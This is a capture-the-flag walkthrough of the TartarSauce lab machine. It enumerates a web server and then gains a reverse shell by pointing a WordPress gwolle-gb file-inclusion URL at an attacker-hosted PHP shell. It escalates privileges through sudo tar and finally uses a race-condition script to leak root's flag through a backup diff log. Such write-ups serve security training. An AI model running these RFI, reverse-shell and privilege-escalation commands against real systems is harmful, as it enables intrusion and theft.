It gives us a list of URLs that web robots are instructed not to visit. Only one of these links is valid.
The application is using a Content Management System (CMS) called Monstra, and the version is displayed in the footer of the site (3.0.4). Let’s see if it has any known exploits.
The version being used is vulnerable to an authenticated RCE exploit. So we first need to find credentials.
Click on the “logged in” link and try the default credentials admin/admin.
It worked! Copy the RCE exploit into the current directory.
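If searchsploit is available, finding and mirroring the exploit looks something like this (the exact Exploit-DB path is whatever the search returns, so treat it as a placeholder):
searchsploit monstra 3.0.4
searchsploit -m <path-from-the-search-output>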
View the exploit.
It seems like there’s insufficient input validation in the file upload functionality, which allows a malicious attacker to upload a PHP script. Let’s try doing that.
I tried a bunch of valid extensions, but I kept getting a “File was not uploaded” error. The upload functionality does not seem to be working at all, so this is a dead end.
We need to enumerate more. Run gobuster on the webservices directory.
dir: directory mode
-w: wordlist
-l: include the length of the body in the output
-t: thread count
-e: expanded mode, print full URLs
-u: URL
-o: output file
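Putting those flags together, the command looks something like this (the wordlist path and thread count are assumptions, and flag names can vary slightly between gobuster versions):
gobuster dir -u http://10.10.10.88/webservices/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -l -t 50 -e -o gobuster-webservices.txt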
Gobuster reveals a WordPress site at /webservices/wp, so let’s run wpscan on it to determine the version in use and enumerate any installed plugins.
--url: the URL of the blog to scan
-e ap: enumerate all plugins
--plugins-detection aggressive: use the aggressive mode
--api-token: personal token for using wpscan
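Putting those options together, the scan looks roughly like this (the /webservices/wp path comes from the gobuster results; substitute your own API token):
wpscan --url http://10.10.10.88/webservices/wp/ -e ap --plugins-detection aggressive --api-token <your-token>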
The WordPress version identified is 4.9.4. It has two plugins installed: akismet and gwolle-gb. Let’s check if the gwolle-gb plugin has any vulnerabilities.
It is vulnerable to a remote file inclusion (RFI). Copy the exploit to the current directory.
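As before, searchsploit can mirror it into the working directory (again, the exact path is whatever the search returns):
searchsploit gwolle
searchsploit -m <path-from-the-search-output>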
View the exploit.
The “abspath” input parameter passed to the PHP require() function is not properly validated, so a malicious attacker can host a PHP script with the filename wp-load.php on a remote server and have the plugin include and execute it.
Shell as www-data
Get a PHP reverse shell from pentestmonkey and rename it to wp-load.php.
Start up a simple server where the shell is located.
Set up a netcat listener on the attack machine to receive the reverse shell.
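A typical setup, assuming the pentestmonkey script is named php-reverse-shell.php and the listener port is an arbitrary choice (edit the $ip and $port variables inside the shell to point at the listener first):
cp php-reverse-shell.php wp-load.php
python3 -m http.server 5555     # simple server in the directory holding wp-load.php
nc -lvnp 1234                   # in a second terminal, wait for the callback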
Visit the following link, substituting the correct URL of the simple server.
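Based on the public gwolle-gb advisory, the vulnerable parameter lives in the plugin’s ajaxresponse.php, so the request should look roughly like this (attacker IP and port are whatever the simple server above uses; the plugin appends wp-load.php to the abspath value itself):
http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.16.4:5555/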
Let’s upgrade it to a better shell.
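One common way to do that, assuming Python is present on the target (use python instead of python3 if needed):
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Ctrl+Z to background the shell, then in the local terminal:
stty raw -echo; fg
# and back in the remote shell:
export TERM=xterm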
Privesc: www-data -> onuma
Run the following command to view the list of allowed commands the user can run using sudo without a password.
As can be seen above, we have the right to run the binary /bin/tar with onuma’s privileges.
GTFOBins has a Sudo entry for tar: “If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.”
Perfect! Run the following command to get a shell running with onuma’s privileges.
Partial Privesc: onuma -> File Read as root
To view the root.txt flag, we need to escalate our privileges to root. Let’s transfer the LinEnum script from our attack machine to the target machine. On the attack machine, start up a server in the same directory the script resides in.
I’ve never seen a service called backuperer.service before, so this must be a custom service. Let’s see if it is being run as a scheduled task. Download pspy32 and view results.
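Assuming both tools sit in the directory being served on the attack machine (IP and port are the attack machine’s; adjust to your setup):
wget http://10.10.16.4:5555/LinEnum.sh && chmod +x LinEnum.sh && ./LinEnum.sh
wget http://10.10.16.4:5555/pspy32 && chmod +x pspy32 && ./pspy32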
It is being run on a consistent basis. Locate the backuperer file on the target system.
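Either of these should surface the related files (locate may need an up-to-date database, hence the find fallback):
locate backuperer
find / -name 'backuperer*' 2>/dev/null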
View the backuperer.timer file.
Let’s break down what the script is doing. First, the following variables are initialized in the script.
Then the script performs the following actions.
Recursively deletes the files/directories /var/tmp/.* and /var/tmp/check (cleanup from the previous run).
Creates a gzipped tar archive of the directory /var/www/html (running tar as onuma) and saves it as /var/tmp/.[random-sha1-value].
Sleeps for 30 seconds.
Creates the directory /var/tmp/check.
Extracts the archive /var/tmp/.[random-sha1-value] into /var/tmp/check.
Runs an integrity check: if the files in /var/www/html differ from the extracted backup under /var/tmp/check/var/www/html, it appends the diff output to an error log in /var/backups. Otherwise, it moves /var/tmp/.[random-sha1-value] to /var/backups/onuma-www-dev.bak and removes the check directory along with any files starting with “.” (the hidden backup archives it created).
The exploit for this is not very intuitive so bear with me as I try to explain it. When the backup is being created, the script sleeps 30 seconds before it executes the rest of the commands. We can use these 30 seconds to replace the backup tar file that the script created with our own malicious file.
After the 30 seconds pass, it will create a directory called “check” and extract our malicious backup tar file there. The integrity check will then compare /var/www/html against the extracted copy, find a difference, and fail, appending the full diff output to the error log in /var/backups. Once the next scheduled run starts about 5 minutes later, backuperer cleans up and our files get deleted, so the window is limited.
Since the script, and therefore the diff, runs as root, that log entry can leak the contents of files we normally can’t read. Let’s start our attack.
To exploit this script, I’ll take advantage of two things: the sleep, and the recursive diff. During the sleep, I’ll unpack the archive, replace one of the files with a link to /root/root.txt, and re-archive it. Then when the script opens the archive and runs the diff, the resulting file will be different, and the contents of both files will end up in the log file.
I originally did this with a long bash one-liner, but it is easier to follow with a script:
Now, upload this to the target and run it. I’ll name it .b.sh for opsec:
┌──(kali💀kali)-[~]
└─$ nikto -h http://10.10.10.88
+ Server: Apache/2.4.18 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /webservices/monstra-3.0.4/: Cookie PHPSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /robots.txt: Entry '/webservices/monstra-3.0.4/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: contains 5 entries which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Server may leak inodes via ETags, header found with file /, inode: 2a0e, size: 565becf5ff08d, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: OPTIONS, GET, HEAD, POST .
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8072 requests: 3 error(s) and 9 item(s) reported on remote host
+ End Time: 2024-01-06 00:08:25 (GMT-5) (4970 seconds)
www-data@TartarSauce:/home$ sudo -l
Matching Defaults entries for www-data on TartarSauce:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on TartarSauce:
(onuma) NOPASSWD: /bin/tar
sudo -u onuma tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
onuma@TartarSauce:/tmp$ cat /lib/systemd/system/backuperer.timer
[Unit]
Description=Runs backuperer every 5 mins
[Timer]
# Time to wait after booting before we run first time
OnBootSec=5min
# Time between running each consecutive time
OnUnitActiveSec=5min
Unit=backuperer.service
[Install]
WantedBy=multi-user.target
The service is run every 5 minutes. Next, view the backuperer script itself.
onuma@TartarSauce:/tmp$ cat /usr/sbin/backuperer
#!/bin/bash
#-------------------------------------------------------------------------------------
# backuperer ver 1.0.2 - by ȜӎŗgͷͼȜ
# ONUMA Dev auto backup program
# This tool will keep our webapp backed up incase another skiddie defaces us again.
# We will be able to quickly restore from a backup in seconds ;P
#-------------------------------------------------------------------------------------
# Set Vars Here
basedir=/var/www/html
bkpdir=/var/backups
tmpdir=/var/tmp
testmsg=$bkpdir/onuma_backup_test.txt
errormsg=$bkpdir/onuma_backup_error.txt
tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)
check=$tmpdir/check
# formatting
printbdr()
{
for n in $(seq 72);
do /usr/bin/printf $"-";
done
}
bdr=$(printbdr)
# Added a test file to let us see when the last backup was run
/usr/bin/printf $"$bdr\nAuto backup backuperer backup last ran at : $(/bin/date)\n$bdr\n" > $testmsg
# Cleanup from last time.
/bin/rm -rf $tmpdir/.* $check
# Backup onuma website dev files.
/usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &
# Added delay to wait for backup to complete if large files get added.
/bin/sleep 30
# Test the backup integrity
integrity_chk()
{
/usr/bin/diff -r $basedir $check$basedir
}
/bin/mkdir $check
/bin/tar -zxvf $tmpfile -C $check
if [[ $(integrity_chk) ]]
then
# Report errors so the dev can investigate the issue.
/usr/bin/printf $"$bdr\nIntegrity Check Error in backup last ran : $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg
integrity_chk >> $errormsg
exit 2
else
# Clean up and save archive to the bkpdir.
/bin/mv $tmpfile $bkpdir/onuma-www-dev.bak
/bin/rm -rf $check .*
exit 0
fi
┌──(kali💀kali)-[~/Desktop/7. Priv Esc]
└─$ nano .b.sh
#!/bin/bash
# work out of shm
cd /dev/shm
# set both start and cur equal to any backup file if it's there
start=$(find /var/tmp -maxdepth 1 -type f -name ".*")
cur=$(find /var/tmp -maxdepth 1 -type f -name ".*")
# loop until there's a change in cur
echo "Waiting for archive filename to change..."
while [ "$start" == "$cur" -o "$cur" == "" ] ; do
sleep 10;
cur=$(find /var/tmp -maxdepth 1 -type f -name ".*");
done
# Grab a copy of the archive
echo "File changed... copying here"
cp $cur .
# get filename
fn=$(echo $cur | cut -d'/' -f4)
# extract archive
tar -zxf $fn
# remove robots.txt and replace it with link to root.txt
rm var/www/html/robots.txt
ln -s /root/root.txt var/www/html/robots.txt
# remove old archive
rm $fn
# create new archive
tar czf $fn var
# put it back, and clean up
mv $fn $cur
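# note: $fn was already moved to $cur above, so the rm below fails harmlessly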
rm $fn
rm -rf var
# wait for results
echo "Waiting for new logs..."
tail -f /var/backups/onuma_backup_error.txt
onuma@TartarSauce:~$ cd /dev/shm
onuma@TartarSauce:/dev/shm$ wget http://10.10.16.4:5555/.b.sh
onuma@TartarSauce:/dev/shm$ chmod +x .b.sh
onuma@TartarSauce:/dev/shm$ ./.b.sh
./.b.sh
Waiting for archive filename to change...
File changed... copying here
tar: var/www/html/webservices/monstra-3.0.4/public/uploads/.empty: Cannot stat: Permission denied
tar: Exiting with failure status due to previous errors
rm: cannot remove '.3af0e9d5f06b92fa0dd4bc929005581eb7976112': No such file or directory
rm: cannot remove 'var/www/html/webservices/monstra-3.0.4/public/uploads/.empty': Permission denied
Waiting for new logs...
Only in /var/www/html/webservices/monstra-3.0.4: robots.txt
Only in /var/www/html/webservices/monstra-3.0.4: rss.php
Only in /var/www/html/webservices/monstra-3.0.4: sitemap.xml
Only in /var/www/html/webservices/monstra-3.0.4: storage
Only in /var/www/html/webservices/monstra-3.0.4: tmp
------------------------------------------------------------------------
Integrity Check Error in backup last ran : Thu Jan 21 05:38:54 EST 2021
------------------------------------------------------------------------
/var/tmp/.379fe8e77f9f84a66b9a6df9a452d10499713829
Binary files /var/www/html/webservices/wp/.wp-config.php.swp and /var/tmp/check/var/www/html/webservices/wp/.wp-config.php.swp differ
------------------------------------------------------------------------
Integrity Check Error in backup last ran : Sat Jan 6 04:38:58 EST 2024
------------------------------------------------------------------------
/var/tmp/.3af0e9d5f06b92fa0dd4bc929005581eb7976112
diff -r /var/www/html/robots.txt /var/tmp/check/var/www/html/robots.txt
1,7c1
< User-agent: *
< Disallow: /webservices/tar/tar/source/
< Disallow: /webservices/monstra-3.0.4/
< Disallow: /webservices/easy-file-uploader/
< Disallow: /webservices/developmental/
< Disallow: /webservices/phpmyadmin/
<
---
> faa---------------------------------
Only in /var/www/html/webservices/monstra-3.0.4/public/uploads: .empty